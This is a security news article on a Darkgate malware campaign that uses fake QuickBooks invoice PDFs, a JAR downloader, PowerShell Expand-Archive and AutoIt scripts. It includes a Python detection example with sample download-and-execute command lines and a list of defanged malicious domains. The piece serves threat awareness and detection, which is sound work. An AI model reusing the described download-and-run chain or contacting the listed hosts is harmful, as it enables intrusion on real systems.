
Darkgate Malware Weaponizing XLSX, HTML, & PDF To Attack Windows Machines

Attackers often deliver malware in XLSX, HTML, and PDF files because these formats are widely used and generally trusted by recipients.

That trust makes it easier to get such attachments opened by recipients who are not expecting an attack.

Forcepoint researchers recently reported that the Darkgate malware is distributed via phishing emails carrying malicious XLSX, HTML, or PDF attachments, after which it takes over accounts and replicates itself.

It is persistent in the sense that it can remain unnoticed while exposing victims to data loss, fraud, blackmail, and leakage of sensitive information.


Technical Analysis

Forcepoint X-Labs analyzed a recent Darkgate campaign initiated through a phishing email containing a fake Intuit QuickBooks invoice PDF.

The PDF tricks users into clicking a link that purports to install Java but instead redirects them to a geofenced URL that silently downloads the next-stage payload.

Attack Chain (Source – Forcepoint)

Analysis of a malicious “may-document_[number].pdf” file shows an invoice PDF whose hyperlink is embedded in a large XObject image.

Clicking the link downloads a malicious .jar file. The associated URLs share patterns with those used previously by QakBot actors, indicating potential connections.

Analyzing the malicious “.jar” file with JD-GUI exposed a “.PNG” and an obfuscated “.class” file containing code that downloads a “.ZIP” file to C:\Downloads\ using a curl.exe command.

Upon downloading the ZIP, it leverages PowerShell’s expand-archive to extract the contents.

The class file can also download and save MSI files. The ZIP contains AutoIt3.exe and a compiled AutoIt script in .a3x format, which the JAR then runs via an obfuscated cmd command.

Darkgate has used AutoIt elsewhere, and this script was compiled using AutoIt 3.26+ with AU3!EA06 headers. Further investigation is needed to determine what this script does.

The script's use of AutoIt's BITXOR and BinaryToString() operations is hard to follow; it assembles a large data stream into a local variable.

The DLLSTRUCTCREATE() library function lets the script load those bytes into memory, after which they abuse system resources. The script obtains shellcode and connects the host to the remote botnet server.
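The chain described above (JAR launching curl.exe to drop a ZIP into C:\Downloads\, PowerShell Expand-Archive unpacking it, AutoIt3.exe executing a .a3x script) can be modelled as a small process-creation detection. The following is an added example, not code from Forcepoint or the article; the event layout (parent image, image, command line) and the sample events are constructed assumptions to adapt to your own EDR or Sysmon schema.

```python
import re
from typing import Callable, List, Tuple

# A process-creation event: (parent image, image, command line). This layout is an
# assumption for the example; map it onto your telemetry's field names.
Event = Tuple[str, str, str]

JAVA_HOSTS = {"java.exe", "javaw.exe"}

# One rule per stage of the chain in the write-up. Each rule receives the
# lower-cased parent image, image and command line and returns True on a match.
STAGE_RULES: List[Tuple[str, Callable[[str, str, str], bool]]] = [
    # Stage 1: the JAR uses curl.exe to write a ZIP under C:\Downloads\.
    ("jar_curl_zip_download",
     lambda p, i, c: p in JAVA_HOSTS and i == "curl.exe"
     and re.search(r"c:\\downloads\\[^\s\"']+\.zip", c) is not None),
    # Stage 2: the ZIP is unpacked with PowerShell's Expand-Archive.
    ("powershell_expand_archive",
     lambda p, i, c: i == "powershell.exe" and "expand-archive" in c),
    # Stage 3: AutoIt3.exe is handed a compiled .a3x script (launched via cmd).
    ("autoit3_runs_a3x",
     lambda p, i, c: "autoit3.exe" in c and ".a3x" in c),
]

def match_stages(events: List[Event]) -> List[str]:
    """Return the chain stages observed in `events`, in chain order, without duplicates."""
    seen = set()
    for parent, image, cmdline in events:
        p, i, c = parent.lower(), image.lower(), cmdline.lower()
        for name, rule in STAGE_RULES:
            if rule(p, i, c):
                seen.add(name)
    return [name for name, _ in STAGE_RULES if name in seen]

def is_darkgate_like(events: List[Event], min_stages: int = 2) -> bool:
    """Flag a host once at least `min_stages` distinct stages of the chain are seen."""
    return len(match_stages(events)) >= min_stages

# Constructed sample telemetry (not real captured data); the URL is a placeholder.
SAMPLE_EVENTS: List[Event] = [
    ("javaw.exe", "curl.exe", r"curl.exe -o C:\Downloads\1.zip hxxp://placeholder.invalid/1.zip"),
    ("javaw.exe", "powershell.exe", r"powershell -Command Expand-Archive C:\Downloads\1.zip -DestinationPath C:\Downloads"),
    ("cmd.exe", "AutoIt3.exe", r"C:\Downloads\AutoIt3.exe C:\Downloads\script.a3x"),
    ("explorer.exe", "notepad.exe", r"notepad.exe C:\Users\user\notes.txt"),
]

if __name__ == "__main__":
    print(match_stages(SAMPLE_EVENTS))   # ['jar_curl_zip_download', 'powershell_expand_archive', 'autoit3_runs_a3x']
    print(is_darkgate_like(SAMPLE_EVENTS))  # True
```

Requiring two or more stages keeps a lone curl.exe or Expand-Archive invocation from firing on its own while still catching the chain early.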

The Darkgate campaign deploys phishing emails posing as QuickBooks invoices to lure users into downloading malicious JAR files that fetch further payloads, such as obfuscated AutoIt scripts.

These scripts run shellcode and communicate with remote servers. The campaign blends professional malware techniques with historical URL patterns, consequently demonstrating an advanced persistent threat (APT).


Initial Stage URLs:


Second stage URL:

  • smbeckwithlaw[.]com/1[.]zip


  • kindupdates[.]com


Tushar Subhra Dutta
